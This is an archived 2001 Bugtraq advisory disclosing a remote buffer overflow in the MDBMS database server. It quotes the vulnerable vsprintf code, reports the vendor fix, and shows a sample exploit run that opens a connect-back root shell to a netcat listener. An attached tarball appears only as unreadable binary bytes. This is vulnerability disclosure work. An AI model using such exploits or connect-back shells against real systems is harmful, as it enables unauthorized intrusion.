6618752 2001-06-12 21:47 +0200  /90 rader/ teleh0r - <teleh0r@digit-labs.org>
Sänt av: joel@lysator.liu.se
Importerad: 2001-06-14  00:08  av Brevbäraren
Extern mottagare: BUGTRAQ@securityfocus.com
Mottagare: Bugtraq (import) <17414>
Ärende: Remote buffer overflow in MDBMS.
------------------------------------------------------------

Dear bugtraq readers,
 
MDBMS is a SQL database server (currently) for UNIX systems.
Version 0.99b9 and below versions contain an exploitable
buffer overflow in the handling of the \s console command.
 
When a user passes large buffers to the server in the form
of multiple lines, these are appended to the end of each
other. A subsequent call to the \s command causes the
overflow.
 
Below is faulty code (from interface.cc):
 
void user::uprintf(char *s, ...)
{
  char b[10000];
  int len=strlen(outbuf), newlen;
  va_list ap;
  va_start(ap,s);
  vsprintf(b,s,ap); <----
  va_end(ap);
  newlen=strlen(b);
  while (newlen+len+10>=outsize) outbuf=(char*)realloc(outbuf,outsize+=1000);
  strcat(outbuf,b);
  FD_SET(fd,&parent->wmask);
}
 
mu-b also found a buffer overflow in the "create database"
system. This was actually caused by a sprintf that generated
the name of the management variable. This has been fixed -
now table and database names can no longer be larger than
128 bytes.
 
Information about the overflows was sent to marty@hinttech.com.
He has now fixed the problems, and new versions of MDBMS can
be found at: http://www.hinttech.com/mdbms/
 
We would like to thank Marty for kind response and quick update.
 
Exploit example:
----------------
 
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl
 
-- Remote code execution exploit - MDBMS <= 0.99b
-- <teleh0r@digit-labs.org> - Copyright (c) 2001
 
Usage: ./mdbms-pms.pl -t <hostname> -b <back>
 
     -t <hostname>    : hostname to test
     -b <back>        : connect back to ip
     -p <port>        : port (default: 2223)
     -d <delay>       : delay before timeout
     -o <offset>      : offset
     -h               : return to heap
 
[teleh0r@localhost mdbms]$ nc -l -v -p 1337 &
[1] 2070
listening on [any] 1337 ...
 
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl -t 127.1 -b localhost -h
 
-- Remote code execution exploit - MDBMS <= 0.99b
-- <teleh0r@digit-labs.org> - Copyright (c) 2001
 
-> Connected to: 127.1 / MDBMS V0.99b9 ready.
-> Address : 0x302027d / xor-mask: 0x2020202
-> Return  : 0x80cfe76 / using the heap ...
-> Sending payload: ...
 
-> * Successfully sent payload - good luck!
 
connect to [127.0.0.1] from localhost.localdomain [127.0.0.1] 1189
[teleh0r@localhost mdbms]$ %
nc -l -v -p 1337
whoami; uname -mnrsp
root
Linux localhost.localdomain 2.4.2-2 i686 unknown
...
 
Exploit code attached.
 
Sincerely yours,
teleh0r and mu-b

--
To avoid criticism, do nothing, say nothing, be nothing.
                 -- Elbert Hubbard
(6618752) /teleh0r - <teleh0r@digit-labs.org>/------
Bilaga (application/x-gzip) i text 6618753
6618753 2001-06-12 21:47 +0200  /41 rader/ teleh0r - <teleh0r@digit-labs.org>
Bilagans filnamn: "mdbms.tar.gz"
Importerad: 2001-06-14  00:08  av Brevbäraren
Extern mottagare: BUGTRAQ@securityfocus.com
Mottagare: Bugtraq (import) <17415>
Bilaga (text/plain) till text 6618752
Ärende: Bilaga (mdbms.tar.gz) till: Remote buffer overflow in MDBMS.
------------------------------------------------------------
‹·o&;ì;iwÛÆ®ýjþŠ‰âĔ£…¤6[^nÒ$msn¶»}½×vu¸Œ$ÖÉp±¥&¹¿ý˜.ò÷µÍ}K˜ãHÌ€0 ´ðœEÚæË8ˆü¬ûÍ_rFß
ðI×ú§ø>ê™f¿?ûߦՌ¾aƒ¿f:õ+O3;aì›$Š²Ûð>÷ü鵨é_Üŋ´Þ†iÜ¢ÓóúŽú£!à÷‡fÿfüyS¸ùú®ÿû÷ºyšt?ìÆ<	4í>ûÈÞñE”qö4ò8{¾änžùQÈü½zöí«#vēž°ýftvw"yūğÍ3¦»MfZ™³bûøÜH{þÌÏÚí¤(™ɓ `D’²„§ÈÓë0|BO¿Íglå¡|ÆLòi±Ë¹pv%ç~8cY4ãÙæB$—~6g‹¼ít
.OîùY:fS?§™ÿþ7Ë‚óĐ)s	ƒ\€»°ƒÜv` 9bøÍí”Íü²ï°c€8<ˆ.E
X‹ÂòS¶°á–^Øfç,Ê3Bït‚n.Û®c»ç텝žw\šFå‰Ë™
k'g¶¤MËSΎ"÷œg{,Ma@ßó,Š³ñø(óö،nR}+;ãx썣ñ|«ÅNØɬ¹§iþ”éŸú!÷ôM€}Øʶ>5›ìۄÔì€pöé|GáãÄ+ððc…GIVÁoÀ÷¾Ç{Uâ{7àG
?šNÓÊü£ðç
Îí¸2Ÿ9áÁ½’D
åáC±Þ&‘>ÌS{Æ'h{@³i“­¶öØÃ8ñÃž%$
ðû'…-èøíñ4Š:é*y2[uBž5ÏÀ3;`/ž1~a§¸Ûöššö8ŒâßØÁ}fZ¾¦`›vÆbÊ%XPiþm2·­”ù·5½qºì~ôć)>,úØÝw;–Æð‹#î%ئÞTàîЇ5j í€=oÕb›h­MXóCÜN´§Ñi²Ò·‚-…m킐ñ}ÖÝf;»°q2ؒ冒‰‰´Ýˆó,‹ÇÝîååeMŽÝ!n4
ˆÚfÉå@Ù§KÏ9]z(–úgÏltÇ5N—ü
‡(•ÓåÎî钝ëÁwCà8ÓÍ8íO‚GÓÑæ\ ÜF©‡;§KcœwÅ(Ñvv'¸7
ÀýÀP#ʑnổ”3”3¦™	oW|N…+ù¨Î·8#Ä‘-ÎÀsrP6àŽzò~'Çá=AW[—)Æ3œBj Þ͐_°;@ùSÃÀŸðÍ_±Pš!Ãl0Ø÷ÄÞŒ„gyÒ¥Ýú7f,ÝòѐáƙN§6÷2"ðãà‚ã(M}ôÞYÄ$=|C¿N,ü0Í`o²hJ0 ƒÄ·(-‹ÈÎ*¶Ó|mÉÁ3žú3°2Ø_€F!äK)BÚØÎÜy‡½ ñÃ(c6µÀ' ¢[œ‰ˆZ4° œG—¢i‹Ü=íoàp9_±b9ȼ‘Î1›(ÈKÈ5Èü
ãÞ	ƒˆðeÖqÝ1Ø)Š]o²3PÂoÿ„äﶬ-­pÇ?0˲zþ=CF
7‚ýå‚7‹ÒLù–ðäè5`Ç<ŸO2Á!Àé‚li|®Rˆ¶ž~ôæéߟ·ÐânmÁxCBØÁ¿XÚ½ßíÎöØæG˜ 	ñ
B¾›éGÇÏÞüxŒ>ñɵêö!$41B‹ÆEèêJ†§aCŽ@S"yâyh¤`6îKÖeË(¡¸+@ÓZwh’	ý·Ж(h•1ÞI{-ÆÈSRy¡ïN§CI˖|b<€@~g^dÈ7°Z—Ô=¤‹íUÙޘ5”46qlð“‰Þ‡ŒM2¨C
4]°eìöÖ4rÂHÛì(w]ñ4Ç+åa¦F…5‹"¹{~Oh&šæ«\š”ˆ,Ë`bÏ&v…zƒ"q„ÿñ#ZŸÞxž$Qfp¯T<fRú¦/Œ	>÷™5â·GHiBØMpGM0òáÍŠÕ6JF¿#ÈF}ü”l6DÄ;ú²¿ÏvšìðØäŸ$±¤_D<”…æêa}’š”"ªMRJh±*¨ŠÁøñDê—¦Ëpû&]Ói“©ëà@5S$Šb:å³ÃC\Ï](_R˜Ãæç)¾¤°úŠ&áPÒÃ,6ˆ‚Sò©8 e?G/¾ÿ°õäå»WÓ0DúP³…>TúÜKMöIú%á
a>“ãLÀlˆ‹ÒÁɱ«ÉžÅ¿ùËÆß³-p¿ùrSFp†_è
7àvÒ éW‘aí[¯Ž.ý°g­¡§ym·µÕ)(/Ni2À~‡5uJ[óˆàÚÅñìtý|ÔWt§amߖn¢b‘gÙ¼YŽ€N>òD9Œr_r_JªÊޔ$¬|0>Á³ŽNépó¬æ檘2›è¨lbHÀy¬‹ÀW_}…
ªN
É
ªQ_¥t{w^f-b(d©ÙdXŸÝƒ•£†µšëRh&!ɸoUî±ê’¯
°2†ø¢—Éo€V·‹’®Ú‹ÿ=!Œ×Ôùèàš±¯*ñúë:.}¼®¾Gê4׬‡µkU¦.T·¦õBãå¨39=M׸A”r‰PšB5’b\ψ¤&™ùàèL¶Ê¸%±K7¬®[ÂØf¬ø¤pðÇï8áp-9Hón|’Oà3 ïÎ*´\ßÊÜx«y§ùáQý¡ßÛï&/^ãLŽŽß=òª%G»5>Kq–Éa\_Ë]T	¥¨òljZ;cxÿ^ÿ‘€“ÁÚÛG¢4Àó9l³‹C±Úµ§³1uK‰<O3‰¨՜Çj‰Œê$€ìÇ5fû¨À
*åâºLóǔ7%²Çö)æÈ"89öW‘L"Gûbß*dq+Ï×ä:®0§Ô4Üo|égR ÿîúä×믽êõ'Ÿe‰ý¾
'è?±Øõÿa¿ÓûŸþ`PÖÿ#ëÿ£Þ×úÿ¹´g2©w¬ƒ—L[š&’GÈBlvô/™gg6${pˆµÝ͓ŽwÁªIÀ¯_ü,SÖ´£ý$«”xîReC”ËeÙ"EϘÙ~TÂ**%2'ˆqŠTïÀò{ˆ…Œ™ªwœ‡4
0ý],ài‡iÚÎ9p¤úÃò
OY€—	®iQxk¼aú¦ãx^?–˜	¤-|¶ÁÅÚq•D¹%¤ê·Ý¹a¶Ãžà#åïs<óº6g˩Ҝ㜨è¤VØÑ´oI4 jòý+‘ÐëÓ$ZÀ3@³]ÞqÝæXÓ."ߣõÇ¹,¸sÐß6L·Óé45LK✘¸·(<ÌÍÒ,‚¤Ùb˜ôð1.ìIàCVƒ%7ºÃM‘évÜJ)Ê^¤r4§•¶ìR¤ý6\“)„Áà¨r&ÞØèâÑ#ü3Ã˜DêÿÙ©˜Í­c»I/g"Wα%±˜ª¬];SÏÅß=›=?Ö§^ëal£U¶/åI2|!g·4’¯“lvƒ‘5\TÊÖL/|°(gÃnp³œ^‘.ñÝð“ÂÕ»ybc]JC¦”'H«#€œcra'T”¬ñõ’ÃÁz§þ’c­Da^bO åÛفAÁ¶	#DáÖápaæ	N dšiíˆ::Ø֋ÍÛ¦“¡íà'¢V.ÖDe°Ö¨|õxKɸ;ï€Õ¦úA¼ûÂ鈹!=$w0³E*Š– ÙrcÃR…ëÀ9jWB‡œ¦Rµ¯"^:waûâ{½<ð`ÿ‹Ü
–sÎ^á´ÈɜûÀ)ái	¹¼Ï}ȬòäÃaµÏåٗ/ílä±Ö^»4íD½‘+³Jåiü³MÖ©½þÖ´ß}ÄÖ*Gê;¨5Mf¡õ¡ÿe¤ìf¤·¨,tYÄuó7{½{¨˜g ۑ¡¡CãTo•ØáêL €Ÿüf€Ò6­QÇDi–Èíù—±+…n1—®äü“Œ°·W­Vã6–=Ã2¬‘W+tKË Z­Àl,Õ;•ëªÌÚuUd’ãï(újš2>Ðì	®Ã€ -Št…h;ô͋˜TÑLsg÷6½=ÐÖ­A»œGöÂßc9íö"LÒXÃDN{‰e¹µ:ýŽÕ¶˜?Üé9ø¾P£Õ*ÿBú¶³â?÷~ä‡.O8¬~å>ëÓ$'…èì9ªžÿ—	æwíÿ2FCc`PÿOÏ´¾ö}‰ë&ý¯7¦ü‘1n?ÿ™¨n¥Ëàùodèëùï\Ým¦§×*; ä@§øn´)«ü˜Ù2¸ I@,è %½Ž.[-0탬’c"{òúÝ^I
;¨ì`%€²`/ÂÇ]˜\b"HÂ?¿y·%X"=LáÀ˜ÅŽ‚f“}ç‹ß;a§2ºÌð%»e“2Ilá»+pö)2€K¢P£)Ӌ DÓgV“ۘ¡âÊ+¡¯‡„#0×î‹<|LCˆ-9Œ æÿB>Aƒd*Ñ ½&®¸&§8G*s	âƒÓm$áBD]Ž#º
$C	<œY𰃁/£Ì]>,T©Tõ\ȉ=aEG“/Ô×BUP?&DïšBÂë-rTPìÛÕŸ}ꏪöôjÔÌÓÝÖ:³NÌuøÌ‹;ÈJ ± ØXÛ¸¯ªÓV‹™XËÇ×jôäÚBõ‹·oß½9~39~ú¶©m@žl<àβÅðm#ÎÓ¹€ll÷
¶¶AãZ¬Ê·`ÉùƒÚ4¨
ˆ‹èÂÙØ4ÁXØ;@\øÎØdòúÝD¬+Úl—’Ÿ	Gÿ8šˆz:qA¶iŒlÝ%Î$ÛØÄDOCA©ò;òƒ“3¬sÈÍÔK¶ÿ·°nД¼€ÖèÁ¿þÈF–ž\Ä»
À¬lö‹°wÀ4ry›%DЖâPß/©·kh5ólR'÷³·.ÄˍÎrmÈ¥Ü NP•øÕá„È%Q]P‚K˜…‚XŸ¾yýúùÓR®B] itSä/ØF¡UMl *¼<¶
=œôÚÆ®YŽ#lÑ-×ëùÒ8,ˆ¢x|ã€Ã^9S
›A~¿†é†äA˜*VP;0lJÝYáй}yFàzï+b,D
|‡;£ž5ò*hwhYSkº&ޚ&–u
Ý Ó¼"5
·ýXCÇpL#ÈÁ¯ì§™çGùaøÎl•vŪÃÁÑ˜»~X‡ÛIlwñ	‚5ª­An4©„ÊIáÜNÎÀîÐkx‡VCÑixºÙ§K£/ú©Ð}{ƀPŠG–h!¬·J½ûp½óPê͇덇
µ¢ê”ë}‡„Ro=\o;s©u®wJ½ñp½éPê}‡ë=‡b.Ôv¨ÝÝZìè‡É“gÏþ1yùæ)ÓÞ¬?stÖ¼Btô⟬_…¾zrô÷ϲ²zuVD$Xi¸±§‡zŽòº=*çQõ¦%K¸Ô	£ZJt¦ã³úy0ÎÉ^¦^ðëu‚z;O…àZüõfžÛñ¯¶ò(üfÑn Ë:¦xk‹Ý<ëª×RÛ…´<Zø¿ñR¢k‚¢Þ'
ܳÖ6uA6ÓbŠ™ÀXC®âb2t
.©*-¥^Q´m!œ¸€&'Ÿž£°G̔½ÈÑݓ+¥;H¶§"?Msùƃò2,x3ā¤IwEӚ«zÖÜGdKxAl5Ã	4;v±é÷
Sý`~œõÑ_¶à‹r5Ñ꘬|®.ÙǶ­Ój·›Š¨Ž¥úE•èÁ}c'Xbâ‡Øԍ¨zØhÙUJX½ÈB3µVu©Î8!aAê$Ü>/‡Vqj7¬­yëÔØj–¶6•³„ÀÈb4²m搩"iµ©A­
gÀ)‡^åâhQ²O½X¬E$ßµ|¼8®„êMS‘önwZЉ¯ôÒ`å;œæC±–uýHüÒh|µ*f[mˆ ½¤	³öCöB2s[j»$³‹“3eè´çôíiSǝn·›7:ÙF#RF?¤Q/Jс¨ãhØëd)Ó½Q9¹(‚?H!Ú
	
¡ã)Zsmój«+(‚^¹8zù:êÆÕÈ#5ñ²_‡&`žµØCÙgs€­[²9ñæõ<€ŸÂYÎ÷Ê#§íÀy¶Ì½ri&åyWÖT5²Â®™Sy
“&'wÔu~“æÞI'"¡¯„ÂV5đ¬·V5h­™~’‡WÌ[8/½fƒÂ£ÿ»K_¯[®µßæmçÏÿðÿÛôGôûϞe™_ë¿_âºFÿ–×?Võ-¯ÏÔ­¾9úïFFð=kôµþû%.LÊJ}5¹WcôzñgõšS½þҗ;p$hÈÇp€¤)
ǀéý`glÔ1[ÉÂ4d9²¼
LSò¹áÄh’W~>,(ꓔ-EézOÑÕnU”¼¶«HvÝÔK„´Ÿo'º©›©?ÓPÄni(R/'Ú¢G¢§hš‡.½–­AìCµ}è_Î}¡TµDÕc¿O8ÇL/~ÅÂ.ûþóì´ãq‰Qéã¨ë¥ËÚmöŒ@/D:¼÷xóž(áþþJM–àK†,}@­Ã é
£+ÅodIQpqKmçó¥ ,e«˜§w«(º¿à×`g¶('©úÀë7o7Œeß,oß¼;ÞÀ–‹åÇW?ýøòõ†Q@Þ|÷ÝÑócˆ#³øáåhqŽ¿ÆÜ¿„PÎVA²¦ð˜mʚ¹<hì©Æ3ÈÓ1Ãe0<øö
Ã:d(üMB‹Ê¡{ZýðcÈãA'&•ÚÙ¦–½°g‰Í8'Ó3¦òË
ùQ¬
°^´+ÊLXê±žÕ œ¾„¹½ò™á*xƒÒSÂCøÀ<øÎÅ÷²ºUâÑ/f—;T㈿¼/ñ^•¾¨þgUæ¶Sâá»rœâùPÍ£Ä3ûò9ó¯Ï³Ä[¯Æ
$~ŸjŽõq¯àJÙTå2k,Š“½
Me½(_Uâ#]ì–xÕùáó¾Y}V…ÕåŒ2¥9ÄüFj~£oړ²pijµ_x\êv:-ÿÊbbE~µ_<7®X¨üUا¦~¤l5T]G\`·ÔB/òÈߓ—Oy,[!Kæ#[­ò±v]ú`ðSIžœÂ؍yÂÉkûaåÿÕÎõõ´
ñçöSxLŒf¤¥Ú
TûŒI{k…Ðh× -L¤ÓP¿û||¶Ó8h/÷{¨šÄw±}öù|¾K+‰B´"€Ræ-<$#Ñ\‡H»)'o¹ü½,~žÒA‚ÝÖ~+ù¿U/œÚC×v–»ë­¡d—
âOÝΓÙ¬\»ûl@Ú
%r¿ŸœäfœH<Í!oi¸Íth¶ši:v^ìl¿çåÇÈô¨™/’9²Ci´7Ò$
F‹_ÓdÉ%4ȱ«ip8&á² O¸93ÁÐ	Ù7ãÌ^;¯¡AU]€ì˜":¸ãÊÂ7Ê9Ù1x<
âÇðè`^Ä4‡D>9|€ž2<àÊ
:!]|ð¯UµUÖ¦Ææ†òoÛÚÌ\C·N{8>EÀ‡iÄ]%T~¡º[8‡ÔÝá!þÝv_°SÜêüoÀM:Xš«ÏêxüÃ<=&—°y#ô~A¦7š!¨´¿B^µcëkk…?àt¿®Š2,Ô`J¿]sæb±êõ*#áÍylaxºÿú#?6¬v°·Ç²=ñTÆ>=ìŠç­¯fŽF“í©ûUÏße¯$Ts½¤´=hgíagdà_½ürqáÅ®â†w*vÓæf½ìÏÖÑNgÅ÷aš5¼´–ˆ’Óçþ\‘3Ìiõ+“뛸Öّ'º+Ñcµ¬n~ß!'›EuÚPƒ–Î9zŒèL„-¹éõ`‡X
²HÉÞq
ZCÙ£Ur0tèv×?ªü|g{wš×—8r¶ï>34÷Ӌϼ¼"%1õ ˜ÅËjÄ©b1@k T»Ì6û·ûCžv«§kÔY¢úøê8H6úy1¸íç^œºnK$TCl-È@Àƒ‰3w.aü¶†dâJXO²n‡·57›û‚ÎÆÏ
ÎÜÞ̗ʁ†(Ÿ;?ޖªÚû±ºÌ)‰rA©ÏÊ7´Ú¬ö¥bB4¦ó
	ñʒʅ•(Ô?¯3&¹6qãˆrŽB·Œ†ûóòFüß[ä˕ιr	v—®C¦DøÙ5|*ŒšŸyÎ22=\ilïŠSZrœSŸ¥‰1+±øúö
J8çoÚ°É&õJÎBÈTÀhy[”}JI–dý§›Âñ(øˆV;o40‚¾kf=aÖ¶`;Ã]Òc&œKˆ{õá5dr‹ª

HËGO¢—ðGjXÇڒ)S~…ÅÉÉ»“cú¨tJMÆu榏;.ýßÎX…B¡P(
…B¡P(
…B¡P(
…B¡P(
…â™ø_0óÁx
(6618753) /teleh0r - <teleh0r@digit-labs.org>/(Ombruten)